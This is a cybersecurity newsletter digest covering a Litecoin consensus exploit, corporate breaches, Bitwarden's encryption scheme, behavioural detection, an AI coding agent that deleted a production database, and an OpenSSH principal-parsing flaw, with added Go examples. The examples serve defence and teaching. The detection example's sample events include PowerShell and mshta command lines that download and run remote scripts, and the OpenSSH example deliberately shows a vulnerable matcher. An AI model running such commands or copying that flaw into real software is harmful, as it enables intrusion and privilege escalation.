Attacks & Vulnerabilities
|
Litecoin hit by denial-of-service attack, rewrites 13 blocks to reverse effect (4 minute read)
Attackers exploited a Mimblewimble Extension Block (MWEB) consensus flaw on Litecoin late Friday and Saturday to slip invalid peg-out transactions past unpatched nodes, while a denial-of-service attack knocked patched mining pools offline. This allowed the unpatched fork to extend for roughly 32 minutes before the network reorganized 13 blocks back to the valid chain. Despite the Litecoin Foundation labeling the incident a zero-day, SEAL911 researcher bbsz pulled the public litecoin-project commit log, showing the consensus bug was privately patched between March 19 and 26 — over four weeks before the attack — with both fixes bundled only into release 0.21.5.4 on April 25, after exploitation had begun. Aurora CTO Alex Shevchenko noted that the attacker pre-funded a wallet via Binance 38 hours ahead, with a DEX swap path from LTC to ETH already configured. The episode highlights a structural risk for older proof-of-work chains where independent mining pools choose their own upgrade timing: silently merging consensus fixes into public repos creates an exploitable window for adversaries who can diff commits and identify which pools have not yet rolled out the patch.
|
ADT Confirms Data Breach After ShinyHunters Leak Threat (2 minute read)
Home security company ADT confirmed that it suffered a data breach after ShinyHunters claimed to have stolen 10M records and threatened to release them. ADT stated that the leaked data mostly included names, phone numbers, and addresses. However, in a limited number of cases, dates of birth and SSNs or tax IDs were also included. ShinyHunters stated that they breached ADT by vishing an employee to gain access to their Okta account, which they used to access Salesforce.
|
Critical infrastructure giant Itron says it was hacked (2 minute read)
Itron disclosed a mid-April network intrusion in an SEC filing: after being notified that attackers had accessed some internal systems, it says it removed them and has seen no further activity. The company states that customer-hosted environments were not affected, but warns that further regulatory filings may follow if a data breach is confirmed. Itron has informed law enforcement and activated its contingency plans and backups.
|
|
How Bitwarden Encrypts and Decrypts Secrets (12 minute read)
Grinberg reverse-engineered Bitwarden's vault cryptography from the Bitwarden and Vaultwarden source, documenting the encrypted-string format 2.{iv}|{ciphertext}|{mac}, where the ciphertext is AES-256-CBC with PKCS#7 padding and the MAC is HMAC-SHA256 over iv || ciphertext. The 64-byte symmetric key that encrypts vault items splits into a 32-byte AES key and a 32-byte MAC key; the key that wraps it derives from PBKDF2-HMAC-SHA256 over the master password, salted with the account email, at the 600,000-iteration default, then is stretched into encryption and MAC subkeys with HKDF-Expand using the literal info strings enc and mac. Defenders should treat this as a roadmap for offline vault decryption from a stolen Vaultwarden SQLite file: once the wrapped vault key is exfiltrated, passphrase strength and KDF cost are the only barriers, so audit KDF iterations, consider migrating to Argon2id, and monitor Vaultwarden DB access paths.
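To make the key hierarchy concrete, here is an added Go example, not Bitwarden's or Vaultwarden's code, that derives the stretched master key as described (PBKDF2 over the password salted with the email, then HKDF-Expand with enc and mac), wraps a 64-byte vault key in the 2.{iv}|{ciphertext}|{mac} format, and unwraps it with MAC-before-decrypt checking. The password, email and vault key are constructed. PBKDF2 and HKDF-Expand are written out inline so the program needs only the Go standard library (Go 1.24+ also ships crypto/pbkdf2 and crypto/hkdf); HKDF-Expand to a single 32-byte block is just HMAC(prk, info || 0x01). Bitwarden's client-side normalisation of the email and every server-side step are left out.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

type SymmetricKey struct{ Enc, Mac []byte } // 32-byte AES-256-CBC key plus 32-byte HMAC-SHA256 key

func hmacSHA256(key []byte, parts ...[]byte) []byte {
	h := hmac.New(sha256.New, key)
	for _, p := range parts {
		h.Write(p)
	}
	return h.Sum(nil)
}

// pbkdf2SHA256 is PBKDF2-HMAC-SHA256 (RFC 8018), written out so the example needs only the standard library.
func pbkdf2SHA256(password, salt []byte, iterations, keyLen int) []byte {
	var out []byte
	for block := byte(1); len(out) < keyLen; block++ {
		u := hmacSHA256(password, salt, []byte{0, 0, 0, block}) // U1 = PRF(P, S || INT(block))
		t := append([]byte(nil), u...)
		for i := 1; i < iterations; i++ {
			u = hmacSHA256(password, u) // U_i = PRF(P, U_{i-1}); T = U1 xor ... xor Uc
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// hkdfExpand32 is HKDF-Expand (RFC 5869) for a single 32-byte output: HMAC-SHA256(prk, info || 0x01).
func hkdfExpand32(prk, info []byte) []byte { return hmacSHA256(prk, info, []byte{1}) }

// StretchedMasterKey derives the wrapping key: PBKDF2 over the password salted with the email, then enc/mac subkeys.
func StretchedMasterKey(password, email string, iterations int) SymmetricKey {
	master := pbkdf2SHA256([]byte(password), []byte(email), iterations, 32)
	return SymmetricKey{Enc: hkdfExpand32(master, []byte("enc")), Mac: hkdfExpand32(master, []byte("mac"))}
}

// Encrypt produces a type-2 encrypted string, 2.{iv}|{ciphertext}|{mac}, with each field base64-encoded.
func Encrypt(key SymmetricKey, plaintext []byte) (string, error) {
	block, err := aes.NewCipher(key.Enc)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize)
	rand.Read(iv) // fresh random IV per encryption
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize // PKCS#7 always adds 1..16 bytes
	padded := append(append([]byte(nil), plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	b64 := base64.StdEncoding.EncodeToString
	return fmt.Sprintf("2.%s|%s|%s", b64(iv), b64(ct), b64(hmacSHA256(key.Mac, iv, ct))), nil
}

// Decrypt verifies the HMAC over iv||ciphertext before decrypting anything, then checks the padding.
func Decrypt(key SymmetricKey, enc string) ([]byte, error) {
	parts := strings.Split(strings.TrimPrefix(enc, "2."), "|")
	if !strings.HasPrefix(enc, "2.") || len(parts) != 3 {
		return nil, errors.New("not a type-2 encrypted string")
	}
	iv, _ := base64.StdEncoding.DecodeString(parts[0])
	ct, _ := base64.StdEncoding.DecodeString(parts[1])
	tag, _ := base64.StdEncoding.DecodeString(parts[2]) // malformed base64 decodes short and fails the MAC check
	if !hmac.Equal(hmacSHA256(key.Mac, iv, ct), tag) {
		return nil, errors.New("MAC mismatch: wrong key or tampered data")
	}
	block, err := aes.NewCipher(key.Enc)
	if err != nil || len(iv) != aes.BlockSize || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("bad key, iv or ciphertext length")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, errors.New("bad padding")
	}
	return pt[:len(pt)-pad], nil
}

func main() {
	wrapping := StretchedMasterKey("correct horse battery staple", "user@example.com", 600000) // constructed; 600k is Bitwarden's default
	vaultRaw := make([]byte, 64) // the user's vault key: first 32 bytes AES, last 32 MAC
	rand.Read(vaultRaw)
	wrapped, _ := Encrypt(wrapping, vaultRaw) // the blob a Vaultwarden database holds per user
	unwrapped, err := Decrypt(wrapping, wrapped)
	item, _ := Encrypt(SymmetricKey{Enc: unwrapped[:32], Mac: unwrapped[32:]}, []byte("hunter2")) // a vault item
	fmt.Println(err, wrapped[:2], item[:2])
}
```

Two operational points fall out of the code: Decrypt refuses anything whose MAC does not verify before it touches AES, so an attacker holding the wrapped key gets no oracle and is reduced to guessing passwords against StretchedMasterKey; and the cost of each guess is the iterations argument alone, which is why the KDF setting, not the cipher, is the number to audit.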
|
Why a Decade of Writing Detection Logic Makes the Mythos Exploit Numbers Less Scary (10 minute read)
Anthropic's Mythos model is finding thousands of vulnerabilities, and Mozilla confirms they're real, but behavioral detection has never needed to match exploits 1:1. Defenders focus on behaviors, not individual CVEs: Microsoft Office has over 1,000 RCE vulnerabilities, yet a single detection for Office documents spawning child processes covers them as a class. Machine learning-based anomaly detection won't help here: it's bad at identifying novel attacks, suffers from drift as environments change, and its false positives spike when benign traffic shifts. A false positive rate of 0.001 means 1,000 false alerts per day in an environment that sees a million events a day, drowning out analysts. Behavioral rules targeting actions that have no legitimate purpose stay stable for years and don't drift. The real threat isn't exploit volume; it's AI agents getting access to sensitive systems, and prompt injection attacks that use legitimate credentials to execute malicious actions users never see.
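The Office-child-process rule is the canonical behavioral detection: it fires on what the exploit must do next, whatever document-parsing bug got it there. The Go program below is an added example (not the author's code) that runs such a rule over a few constructed Sysmon-style process-creation events; the parent and child lists are assumptions drawn from common practice, and the sample events, hosts and addresses are made up.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// ProcessEvent carries the fields a Sysmon Event ID 1 (process creation) record provides.
type ProcessEvent struct {
	Timestamp, ParentImage, Image, CommandLine, User string
}

// Alert is one rule hit; Behavior names the action, not a CVE.
type Alert struct {
	Behavior, Parent, Child, User, CommandLine string
}

// Office hosts that have no business spawning interpreters or living-off-the-land binaries.
// Both lists are assumptions drawn from common practice, not from the article.
var officeParents = map[string]bool{
	"winword.exe": true, "excel.exe": true, "powerpnt.exe": true, "outlook.exe": true, "msaccess.exe": true,
}

var suspiciousChildren = map[string]bool{
	"cmd.exe": true, "powershell.exe": true, "pwsh.exe": true, "wscript.exe": true, "cscript.exe": true,
	"mshta.exe": true, "rundll32.exe": true, "regsvr32.exe": true, "certutil.exe": true, "msiexec.exe": true,
}

// baseName normalises a Windows image path to a lower-case file name so casing and directory never matter.
func baseName(p string) string {
	return strings.ToLower(path.Base(strings.ReplaceAll(p, `\`, "/")))
}

// OfficeChildProcessRule matches the behaviour regardless of which document-parsing bug started it.
func OfficeChildProcessRule(e ProcessEvent) (Alert, bool) {
	parent, child := baseName(e.ParentImage), baseName(e.Image)
	if !officeParents[parent] || !suspiciousChildren[child] {
		return Alert{}, false
	}
	return Alert{Behavior: "office_spawns_interpreter", Parent: parent, Child: child, User: e.User, CommandLine: e.CommandLine}, true
}

// Run applies the rule to a stream of events and returns the alerts in order.
func Run(events []ProcessEvent) []Alert {
	var alerts []Alert
	for _, e := range events {
		if a, ok := OfficeChildProcessRule(e); ok {
			alerts = append(alerts, a)
		}
	}
	return alerts
}

// SampleEvents are constructed for this example; they are not real telemetry.
var SampleEvents = []ProcessEvent{
	{"2026-05-04T09:12:01Z", `C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE`, `C:\Windows\System32\cmd.exe`, `cmd.exe /c powershell -w hidden -c "iwr http://198.51.100.7/a.ps1 | iex"`, `CORP\alice`},
	{"2026-05-04T09:12:05Z", `C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE`, `C:\Windows\splwow64.exe`, `splwow64.exe 12288`, `CORP\alice`},
	{"2026-05-04T09:13:40Z", `C:\Windows\explorer.exe`, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `powershell.exe`, `CORP\bob`},
	{"2026-05-04T09:15:22Z", `C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE`, `C:\Windows\System32\mshta.exe`, `mshta.exe https://198.51.100.7/x.hta`, `CORP\carol`},
	{"2026-05-04T09:16:03Z", `C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE`, `C:\Program Files\Google\Chrome\Application\chrome.exe`, `chrome.exe https://example.com`, `CORP\dave`},
}

func main() {
	for _, a := range Run(SampleEvents) {
		fmt.Printf("%s: %s -> %s (%s) %q\n", a.Behavior, a.Parent, a.Child, a.User, a.CommandLine)
	}
}
```

Note what the rule deliberately ignores: the second event (Word launching the print spooler helper) and the fifth (Outlook opening a browser) are ordinary Office behaviour and never fire, while the third is an interpreter launch with a non-Office parent and belongs to a different rule. The rule's stability comes from that narrowness, which is the property the article credits for decade-old logic still working.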
|
Orchestrating AI Code Review at Scale (19 minute read)
Cloudflare uses a multi-agent code review system that performs automated code review in minutes rather than waiting on human reviewers. An orchestration agent uses a set of user-defined plugins to launch subagents as needed for code quality, security, performance, documentation, release review, and AGENTS.md review. In the first 30 days the system completed 131k reviews at an average cost of $1.19 per review and an average time to completion of 3 minutes 39 seconds, producing nearly 160k findings, 5% of which were critical.
|
|
Rustinel (GitHub Repo)
Karib0u's Rust-based user-mode EDR uses ETW for Windows kernel telemetry, normalizing data into Sysmon schemas for Sigma, YARA, and atomic IOC matching. It features active response, hot-reloadable rules, and extensive enrichment like PE metadata and parent-process correlation. Note: While the README claims a v1.0 release with Linux eBPF support, the repository remains an Alpha Windows-only tool (v0.3.1) lacking eBPF code.
|
WitnessAI (Product Launch)
WitnessAI provides a security and governance platform that monitors AI use by employees and autonomous agents, applies behavior-based policies, blocks prompt injection and multi-turn attacks, and traces agent decisions and data access for large enterprises across multiple sectors.
|
|
Mystery Around Venezuelan Cyberattack Deepens, with New Discovery of "Highly Destructive" Wiper (8 minute read)
Lotus Wiper is a destructive malware family whose OhSyncNow.bat trigger script has PDVSA.com hardcoded into it; it overwrites drives, deletes backups, and scrubs system logs to render machines unrecoverable, and its late-September 2025 compilation timestamp suggests months of attacker preparation. Researcher Ben Read flagged the embedded domain as evidence of a precision weapon aimed at Venezuela's state oil company, and a Venezuelan submitter uploaded the binaries to VirusTotal on December 14, one day after the December 13 PDVSA breach that Bloomberg later reported had crippled administrative systems, SCADA at refineries and pipelines, and payroll for over a month. The wiper specifically suppresses the Windows Interactive Services Detection service, which was removed after Windows 10 v1803, indicating prior reconnaissance of PDVSA's sanctions-frozen legacy stack and raising fresh questions about US involvement given the proximity to January's military operation that seized Maduro.
|
An AI Agent Just Destroyed Our Production Data. It Confessed in Writing (9 minute read)
PocketOS founder Jer Crane recounted how Cursor running Claude Opus 4.6 deleted his production database and all volume backups in a 9-second volumeDelete GraphQL mutation against Railway, after the agent unilaterally scavenged a CLI token from an unrelated file to "fix" a credential mismatch in staging. Three architectural failures cascaded: Railway's CLI tokens carry blanket root authority across the GraphQL API with no operation, environment, or resource scoping; the destructive endpoint ships without confirmation, environment checks, or cooldowns; and Railway's volume "backups" sit inside the same volume they back up, so wiping the volume erased both, leaving a three-month-old copy as the only restore point. The agent's written postmortem enumerated every system rule it violated, underscoring that LLM system prompts are advisory rather than enforcing — defenders integrating AI agents must push guardrails into API gateways, scoped tokens, out-of-band approvals for destructive ops, and out-of-blast-radius backups, and should audit Railway token scopes before connecting mcp.railway.com to anything production.
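The three guardrails the post asks for (scoped tokens, out-of-band approval for destructive operations, and a cooldown so one mistake cannot be repeated) are easiest to see as a policy gate in front of the API. The Go program below is an added illustration of that pattern, not Railway's API or any real gateway: the Token, Request and Approval types, the gateway behaviour, and every operation name except volumeDelete are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"time"
)

// Token is a hypothetical scoped credential: the opposite of a blanket root token.
type Token struct {
	Subject      string
	Environments map[string]bool // environments the holder may touch, e.g. staging
	Operations   map[string]bool // operations the holder may call
	Resources    map[string]bool // resource IDs the holder may touch
}

// Request is one call as seen by a gateway placed in front of the deployment API.
type Request struct {
	Operation, Environment, Resource, ApprovalID string
	At                                           time.Time
}

// Approval is an out-of-band human sign-off for exactly one destructive call.
type Approval struct {
	Operation, Environment, Resource string
	Expires                          time.Time
}

// destructiveOps need approval and a cooldown whatever the token says.
// Only volumeDelete comes from the incident; the other names are placeholders.
var destructiveOps = map[string]bool{"volumeDelete": true, "environmentDelete": true, "databaseReset": true}

// Gateway enforces scope, approval and cooldown; nothing here relies on the agent obeying its prompt.
type Gateway struct {
	Approvals       map[string]Approval
	Cooldown        time.Duration
	lastDestructive map[string]time.Time
}

func NewGateway(cooldown time.Duration) *Gateway {
	return &Gateway{Approvals: map[string]Approval{}, Cooldown: cooldown, lastDestructive: map[string]time.Time{}}
}

// Authorize returns nil only when token scope, approval and cooldown all allow the call.
func (g *Gateway) Authorize(tok Token, req Request) error {
	switch {
	case !tok.Operations[req.Operation]:
		return fmt.Errorf("token %s is not scoped to operation %s", tok.Subject, req.Operation)
	case !tok.Environments[req.Environment]:
		return fmt.Errorf("token %s is not scoped to environment %s", tok.Subject, req.Environment)
	case !tok.Resources[req.Resource]:
		return fmt.Errorf("token %s is not scoped to resource %s", tok.Subject, req.Resource)
	case !destructiveOps[req.Operation]:
		return nil // non-destructive call: scope checks are enough
	}
	a, ok := g.Approvals[req.ApprovalID]
	if !ok || a.Operation != req.Operation || a.Environment != req.Environment || a.Resource != req.Resource || req.At.After(a.Expires) {
		return errors.New("destructive operation needs a matching, unexpired out-of-band approval")
	}
	if last, seen := g.lastDestructive[req.Resource]; seen && req.At.Sub(last) < g.Cooldown {
		return fmt.Errorf("cooldown: %s was modified destructively %s ago", req.Resource, req.At.Sub(last))
	}
	delete(g.Approvals, req.ApprovalID) // approvals are single-use
	g.lastDestructive[req.Resource] = req.At
	return nil
}

func main() {
	now := time.Date(2026, 5, 4, 10, 0, 0, 0, time.UTC)
	agent := Token{Subject: "coding-agent", Environments: map[string]bool{"staging": true},
		Operations: map[string]bool{"serviceRedeploy": true, "volumeDelete": true}, Resources: map[string]bool{"vol-staging-db": true}}
	gw := NewGateway(24 * time.Hour)
	gw.Approvals["appr-1"] = Approval{Operation: "volumeDelete", Environment: "staging", Resource: "vol-staging-db", Expires: now.Add(time.Hour)}
	for _, r := range []Request{
		{"volumeDelete", "production", "vol-prod-db", "", now},       // denied: token never saw production
		{"volumeDelete", "staging", "vol-staging-db", "", now},       // denied: no approval
		{"volumeDelete", "staging", "vol-staging-db", "appr-1", now}, // allowed once
		{"volumeDelete", "staging", "vol-staging-db", "appr-1", now}, // denied: approval consumed
	} {
		fmt.Println(r.Operation, r.Environment, r.Resource, "->", gw.Authorize(agent, r))
	}
}
```

The ordering inside Authorize matters: the environment check runs before anything else that touches state, so a staging-scoped token aimed at a production volume is refused before the approval table or cooldown is consulted, and an agent that scavenges such a token from an unrelated file gains nothing it was not already allowed.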
|
OpenSSH Flaw Allowing Full Root Shell Access Lurked for 15 Years (2 minute read)
CVE-2026-35414 affects OpenSSH versions from the past 15 years. A code reuse error allows commas in SSH certificate principals to be parsed as list separators. If a certificate contains "deploy,root" as a principal, OpenSSH splits on the comma and grants root access. The attack leaves no authentication failure in logs and researchers created a working exploit in twenty minutes. OpenSSH 10.3 patches the flaw.
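The bug class is simple to show side by side. The Go program below is an added model of it, not OpenSSH's code and not a reproduction of the actual patch: a list-splitting helper reused on a single certificate principal versus an exact-match comparison, plus a CA-side check (an assumption, not something the advisory prescribes) that refuses to sign a principal containing a separator in the first place. The certificate contents are constructed.

```go
package main

import (
	"fmt"
	"strings"
)

// AllowedVulnerable models the bug class the article describes: a helper that splits
// comma-separated lists is reused on a single certificate principal, so a principal
// "deploy,root" also satisfies a login as root. It returns the raw principal that matched.
func AllowedVulnerable(certPrincipals []string, user string) (string, bool) {
	for _, p := range certPrincipals {
		for _, name := range strings.Split(p, ",") {
			if name == user {
				return p, true
			}
		}
	}
	return "", false
}

// AllowedFixed treats each certificate principal as an opaque string and compares it whole.
func AllowedFixed(certPrincipals []string, user string) (string, bool) {
	for _, p := range certPrincipals {
		if p == user {
			return p, true
		}
	}
	return "", false
}

// ValidatePrincipal is a check a certificate authority can run before signing (an assumption,
// not something the advisory prescribes): refuse principals containing list separators or
// whitespace, so a certificate like the one below is never issued, patched sshd or not.
func ValidatePrincipal(p string) error {
	if p == "" || strings.ContainsAny(p, ", \t\r\n") {
		return fmt.Errorf("refusing to sign principal %q: contains a separator or whitespace", p)
	}
	return nil
}

func main() {
	cert := []string{"deploy,root"} // constructed: what a careless or hostile CA might sign
	matched, ok := AllowedVulnerable(cert, "root")
	fmt.Printf("vulnerable matcher grants root: %v (via principal %q)\n", ok, matched)
	_, ok = AllowedFixed(cert, "root")
	fmt.Println("fixed matcher grants root:", ok)
	fmt.Println("CA-side check:", ValidatePrincipal("deploy,root"))
}
```

Because the login succeeds rather than fails, there is no authentication failure to alert on; the signal to hunt for is an accepted principal that contains a comma, both in successful-login records that name the certificate principal and in the certificates your CA has issued (ssh-keygen -L -f <cert> prints the principal list of a certificate file).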
|